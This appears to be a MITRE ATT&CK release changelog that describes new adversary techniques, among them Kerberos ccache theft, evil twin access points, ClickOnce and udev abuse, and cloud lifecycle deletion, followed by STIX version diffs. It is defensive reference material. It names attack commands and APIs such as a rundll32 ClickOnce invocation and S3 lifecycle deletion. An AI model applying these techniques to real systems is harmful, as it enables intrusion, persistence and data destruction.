These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.
New Techniques
[T1098.007] Account Manipulation: Additional Local or Domain Groups
Current version: 1.0
Description: An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.
On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation: Microsoft Net Group) On Linux, adversaries may use the `usermod` command for the same purpose.(Citation: Linux Usermod)
For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) for elevated privileges.
In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.(Citation: RootDSE AD Detection 2022)
[T1496.002] Resource Hijacking: Bandwidth Hijacking
Current version: 1.0
Description: Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)
In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)
[T1558.005] Steal or Forge Kerberos Tickets: Ccache Files
Current version: 1.0
Description:
Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials.
The /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using kinit
, which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)
Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
[T1127.002] Trusted Developer Utilities Proxy Execution: ClickOnce
Current version: 1.0
Description: Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
[T1496.004] Resource Hijacking: Cloud Service Hijacking
Current version: 1.0
Description: Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability.
For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)
In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability.
[T1496.001] Resource Hijacking: Compute Hijacking
Current version: 1.0
Description: Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
One common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
[T1213.004] Data from Information Repositories: Customer Relationship Management Software
Current version: 1.0
Description: Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
[T1557.004] Adversary-in-the-Middle: Evil Twin
Current version: 1.0
Description: Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)
By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin) Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic.
Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin) Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.
Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points.
[T1485.001] Data Destruction: Lifecycle-Triggered Deletion
Current version: 1.0
Description: Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once.
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)
[T1059.011] Command and Scripting Interpreter: Lua
Current version: 1.0
Description: Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
[T1036.010] Masquerading: Masquerade Account Name
Current version: 1.0
Description: Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)
Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.
[T1213.005] Data from Information Repositories: Messaging Applications
Current version: 1.0
Description: Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications:
* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
* Source code snippets
* Links to network shares and other internal resources
* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)
* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)
In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)
[T1666] Modify Cloud Resource Hierarchy
Current version: 1.0
Description: Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.
IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)
Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)
In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)
[T1480.002] Execution Guardrails: Mutual Exclusion
Current version: 1.0
Description: Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
[T1027.014] Obfuscated Files or Information: Polymorphic Code
Current version: 1.0
Description: Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone)
Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)
[T1071.005] Application Layer Protocol: Publish/Subscribe Protocols
Current version: 1.0
Description: Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as MQTT
, XMPP
, AMQP
, and STOMP
use a publish/subscribe design, with message distribution managed by a centralized broker.(Citation: wailing crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.
[T1070.010] Indicator Removal: Relocate Malware
Current version: 1.0
Description: Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
[T1496.003] Resource Hijacking: SMS Pumping
Current version: 1.0
Description: Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
[T1546.017] Event Triggered Execution: Udev Rules
Current version: 1.0
Description: Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
Minor Version Changes
[T1003.008] OS Credential Dumping: /etc/passwd and /etc/shadow
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['root'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-20 15:56:55.022000+00:00 | 2024-09-25 20:48:04.491000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1558.004] Steal or Forge Kerberos Tickets: AS-REP Roasting
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-06-07 19:23:33.039000+00:00 | 2024-10-15 15:32:07.850000+00:00 |
external_references[1]['description'] | HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020. | HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September 23, 2024. |
external_references[1]['url'] | http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ | https://blog.harmj0y.net/activedirectory/roasting-as-reps/ |
x_mitre_version | 1.0 | 1.1 |
[T1548] Abuse Elevation Control Mechanism
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-15 20:52:09.908000+00:00 | 2024-10-15 15:32:21.811000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[5] | Google Workspace | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Azure AD | |
[T1531] Account Access Removal
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-22 20:39:15.680000+00:00 | 2024-10-15 15:35:13.577000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | IaaS |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
[T1087] Account Discovery
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-12 23:36:56.245000+00:00 | 2024-10-15 15:35:28.784000+00:00 |
x_mitre_version | 2.4 | 2.5 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1098] Account Manipulation
Current version: 2.7
Version changed from: 2.6 → 2.7
New Mitigations:
- M1022: Restrict File and Directory Permissions
- M1042: Disable or Remove Feature or Program
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-16 22:24:38.234000+00:00 | 2024-10-15 15:35:57.382000+00:00 |
x_mitre_version | 2.6 | 2.7 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1137.006] Office Application Startup: Add-ins
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-08-16 21:26:09.296000+00:00 | 2024-10-15 15:37:09.190000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1098.001] Account Manipulation: Additional Cloud Credentials
Current version: 2.8
Version changed from: 2.7 → 2.8
|
|
t | Adversaries may add adversary-controlled credentials to a cl | t | Adversaries may add adversary-controlled credentials to a cl |
| oud account to maintain persistent access to victim accounts | | oud account to maintain persistent access to victim accounts |
| and instances within the environment. For example, adversa | | and instances within the environment. For example, adversa |
| ries may add credentials for Service Principals and Applicat | | ries may add credentials for Service Principals and Applicat |
| ions in addition to existing legitimate credentials in Azure | | ions in addition to existing legitimate credentials in Azure |
| AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citat | | / Entra ID.(Citation: Microsoft SolarWinds Customer Guidanc |
| ion: Blue Cloud of Death)(Citation: Blue Cloud of Death Vide | | e)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of De |
| o) These credentials include both x509 keys and passwords.(C | | ath Video) These credentials include both x509 keys and pass |
| itation: Microsoft SolarWinds Customer Guidance) With suffic | | words.(Citation: Microsoft SolarWinds Customer Guidance) Wit |
| ient permissions, there are a variety of ways to add credent | | h sufficient permissions, there are a variety of ways to add |
| ials including the Azure Portal, Azure command line interfac | | credentials including the Azure Portal, Azure command line |
| e, and Azure or Az PowerShell modules.(Citation: Demystifyin | | interface, and Azure or Az PowerShell modules.(Citation: Dem |
| g Azure AD Service Principals) In infrastructure-as-a-servi | | ystifying Azure AD Service Principals) In infrastructure-as |
| ce (IaaS) environments, after gaining access through [Cloud | | -a-service (IaaS) environments, after gaining access through |
| Accounts](https://attack.mitre.org/techniques/T1078/004), ad | | [Cloud Accounts](https://attack.mitre.org/techniques/T1078/ |
| versaries may generate or import their own SSH keys using ei | | 004), adversaries may generate or import their own SSH keys |
| ther the <code>CreateKeyPair</code> or <code>ImportKeyPair</ | | using either the <code>CreateKeyPair</code> or <code>ImportK |
| code> API in AWS or the <code>gcloud compute os-login ssh-ke | | eyPair</code> API in AWS or the <code>gcloud compute os-logi |
| ys add</code> command in GCP.(Citation: GCP SSH Key Add) Thi | | n ssh-keys add</code> command in GCP.(Citation: GCP SSH Key |
| s allows persistent access to instances within the cloud env | | Add) This allows persistent access to instances within the c |
| ironment without further usage of the compromised cloud acco | | loud environment without further usage of the compromised cl |
| unts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind | | oud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expe |
| the Scenes) Adversaries may also use the <code>CreateAcces | | l Behind the Scenes) Adversaries may also use the <code>Cre |
| sKey</code> API in AWS or the <code>gcloud iam service-accou | | ateAccessKey</code> API in AWS or the <code>gcloud iam servi |
| nts keys create</code> command in GCP to add access keys to | | ce-accounts keys create</code> command in GCP to add access |
| an account. If the target account has different permissions | | keys to an account. Alternatively, they may use the <code>Cr |
| from the requesting account, the adversary may also be able | | eateLoginProfile</code> API in AWS to add a password that ca |
| to escalate their privileges in the environment (i.e. [Cloud | | n be used to log into the AWS Management Console for [Cloud |
| Accounts](https://attack.mitre.org/techniques/T1078/004)).( | | Service Dashboard](https://attack.mitre.org/techniques/T1538 |
| Citation: Rhino Security Labs AWS Privilege Escalation)(Cita | | ).(Citation: Permiso Scattered Spider 2023)(Citation: Lacewo |
| tion: Sysdig ScarletEel 2.0) For example, in Azure AD enviro | | rk AI Resource Hijacking 2024) If the target account has dif |
| nments, an adversary with the Application Administrator role | | ferent permissions from the requesting account, the adversar |
| can add a new set of credentials to their application's ser | | y may also be able to escalate their privileges in the envir |
| vice principal. In doing so the adversary would be able to a | | onment (i.e. [Cloud Accounts](https://attack.mitre.org/techn |
| ccess the service principal’s roles and permissions, which m | | iques/T1078/004)).(Citation: Rhino Security Labs AWS Privile |
| ay be different from those of the Application Administrator. | | ge Escalation)(Citation: Sysdig ScarletEel 2.0) For example, |
| (Citation: SpecterOps Azure Privilege Escalation) In AWS e | | in Entra ID environments, an adversary with the Application |
| nvironments, adversaries with the appropriate permissions ma | | Administrator role can add a new set of credentials to thei |
| y also use the `sts:GetFederationToken` API call to create a | | r application's service principal. In doing so the adversary |
| temporary set of credentials to [Forge Web Credentials](htt | | would be able to access the service principal’s roles and p |
| ps://attack.mitre.org/techniques/T1606) tied to the permissi | | ermissions, which may be different from those of the Applica |
| ons of the original user account. These temporary credential | | tion Administrator.(Citation: SpecterOps Azure Privilege Esc |
| s may remain valid for the duration of their lifetime even i | | alation) In AWS environments, adversaries with the appropr |
| f the original account’s API credentials are deactivated. (C | | iate permissions may also use the `sts:GetFederationToken` A |
| itation: Crowdstrike AWS User Federation Persistence) | | PI call to create a temporary set of credentials to [Forge W |
| | | eb Credentials](https://attack.mitre.org/techniques/T1606) t |
| | | ied to the permissions of the original user account. These t |
| | | emporary credentials may remain valid for the duration of th |
| | | eir lifetime even if the original account’s API credentials |
| | | are deactivated. (Citation: Crowdstrike AWS User Federation |
| | | Persistence) In Entra ID environments with the app password |
| | | feature enabled, adversaries may be able to add an app pass |
| | | word to a user account.(Citation: Mandiant APT42 Operations |
| | | 2024) As app passwords are intended to be used with legacy d |
| | | evices that do not support multi-factor authentication (MFA) |
| | | , adding an app password can allow an adversary to bypass MF |
| | | A requirements. Additionally, app passwords may remain valid |
| | | even if the user’s primary password is reset.(Citation: Mic |
| | | rosoft Entra ID App Passwords) |
New Mitigations:
- M1042: Disable or Remove Feature or Program
New Detections:
- DS0026: Active Directory (Active Directory Object Creation)
- DS0026: Active Directory (Active Directory Object Modification)
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-02-28 14:35:00.862000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
